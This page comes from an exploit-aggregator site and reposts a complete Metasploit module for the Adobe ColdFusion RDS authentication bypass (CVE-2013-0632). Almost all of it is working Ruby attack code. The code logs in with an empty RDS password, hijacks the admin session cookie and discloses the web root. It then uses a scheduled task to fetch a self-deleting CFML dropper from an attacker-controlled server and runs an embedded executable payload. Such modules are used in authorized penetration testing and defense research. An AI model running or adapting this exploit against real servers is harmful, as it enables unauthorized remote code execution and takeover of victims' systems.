Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110045

Below is a copy:

Adobe ColdFusion RDS Authentication Bypass
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Module::Deprecated

  moved_from 'exploit/multi/http/coldfusion_rds'

  Rank = GreatRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Adobe ColdFusion RDS Authentication Bypass',
      'Description'     => %q{
        Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
        attackers to bypass authentication using the RDS component. Due to
        default settings or misconfiguration, its password can be set to an
        empty value. This allows an attacker to create a session via the RDS
        login that can be carried over to the admin web interface even though
        the passwords might be different, and therefore bypassing authentication
        on the admin web interface leading to arbitrary code execution. Tested
        on Windows and Linux with ColdFusion 9.
      },
      'Author'          =>
        [
          'Scott Buckel', # Vulnerability discovery
          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ "CVE", "2013-0632" ],
          [ "EDB", "27755" ],
          [ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
        ],
      'Privileged'      => false,
      'Stance'          => Msf::Exploit::Stance::Aggressive, #thanks juan!
      'Platform'        => ['win', 'linux'],
      'Targets'         =>
        [
         [ 'Windows',
            {
            'Arch' => ARCH_X86,
            'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
            'Arch' => ARCH_X86,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Aug 08 2013'
    ))

    register_options(
      [
        OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
        OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
      ])

    register_advanced_options(
      [
        OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
      ])
  end

  def check
    uri = target_uri.path

    #can we access the admin interface?
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
    })

    if res && res.code == 200 && res.body.include?('ColdFusion Administrator Login')
       vprint_good "Administrator access available"
    else
      return Exploit::CheckCode::Safe
    end

    #is it cf9?
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
    })

    img = Rex::Text.md5(res.body.to_s)
    imghash = "596b3fc4f1a0b818979db1cf94a82220"

    if img == imghash
      vprint_good "ColdFusion 9 Detected"
    else
      return Exploit::CheckCode::Safe
    end

    #can we access the RDS component?
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
      'vars_post' => {
          'method' => "login",
          'adminpassword' => "",
          'rdsPasswordAllowed' => "1"
       }
    })

    if res && res.code == 200 && res.body.include?('true')
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    @pl           = gen_file_dropper
    @payload_url  = ""

    if datastore['EXTURL'].blank?
      begin
        Timeout.timeout(datastore['HTTPDELAY']) {super}
      rescue Timeout::Error
      end
      exec_payload
    else
      @payload_url = datastore['EXTURL']
      upload_payload
      exec_payload
    end
  end

  def primer
    @payload_url = get_uri
    upload_payload
  end

  def on_request_uri(cli, request)
    if request.uri =~ /#{get_resource}/
      send_response(cli, @pl)
    end
  end

  def autofilter
    true
  end

  #task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
  #instead we use a CFML filedropper to embed our payload and execute it.
  #this also removes the dependancy of using the probe.cfm to execute the file.

  def gen_file_dropper
    rand_var    = rand_text_alpha(8+rand(8))
    rand_file   = rand_text_alpha(8+rand(8))

    if datastore['TARGET'] == 0
      rand_file += ".exe"
    end

    encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)

    print_status "Building CFML shell..."
    #embed payload
    shell = ""
    shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
    shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
    #if linux set correct permissions
    if datastore['TARGET'] == 1
      shell += " mode = \"700\""
    end
    shell += "/>"
    #clean up our evil .cfm
    shell += " <cffile action=\"delete\""
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
    #execute our payload!
    shell += " <cfexecute"
    shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
    shell += " arguments = \"\""
    shell += " timeout = \"60\"/>"

    return shell
  end

  def exec_payload
    uri = target_uri.path

    print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
    print_status("Executing payload...")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
    })
  end

  def upload_payload
    uri = target_uri.path

    @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
    taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea

    print_status "Trying to upload payload via scheduled task..."
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
      'vars_post' => {
          'method' => "login",
          'adminpassword' => "",
          'rdsPasswordAllowed' => "1"
       }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
    end

    #deal with annoying cookie data prepending (sunglasses)
    cookie = res.get_cookies

    if res && res.code == 200 && cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
      cookie = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
    end

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
      'cookie' => cookie
    })

    if res && res.code == 200 && res.body.include?('ColdFusion Administrator')
      print_good("Logged in as Administrator!")
    else
      fail_with(Failure::Unknown, "#{peer} - Login Failed")
    end

    #get file path gogo
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
      'vars_get' => {
        'name' => "/CFIDE"
      },
      'cookie' => cookie
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
    end

    if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
      file_path = $1
      print_good("File path disclosed! #{file_path}")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
    end

    print_status("Adding scheduled task")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
      'vars_post' => {
        'TaskName' => taskname,
        'Start_Date' => "Nov 1, 2420",
        'End_Date' => "",
        'Interval' => "",
        'ScheduleType' => "Once",
        'Operation' => "HTTPRequest",
        'ScheduledURL' => @payload_url,
        'publish' => "1",
        'publish_file' => "#{file_path}\\#{@filename}",
        'adminsubmit' => "Submit"
      },
      'cookie' => cookie
    })

    unless res && res.code == 200 || res.code == 302 #302s can happen but it still works, http black magic!
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
    end

    print_status("Running scheduled task")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
      'vars_get' => {
        'runtask' => taskname,
        'timeout' => "0"
      },
      'cookie' => cookie
      })

    if res && res.code == 200 && res.body.include?('This scheduled task was completed successfully')
      print_good("Scheduled task completed successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
    end

    print_status("Deleting scheduled task")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
      'vars_get' => {
        'action' => "delete",
        'task' => taskname
      },
      'cookie' => cookie
    })

    unless res && res.code == 200
      print_error("Scheduled task deletion failed, cleanup might be needed!")
    end
  end
end

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.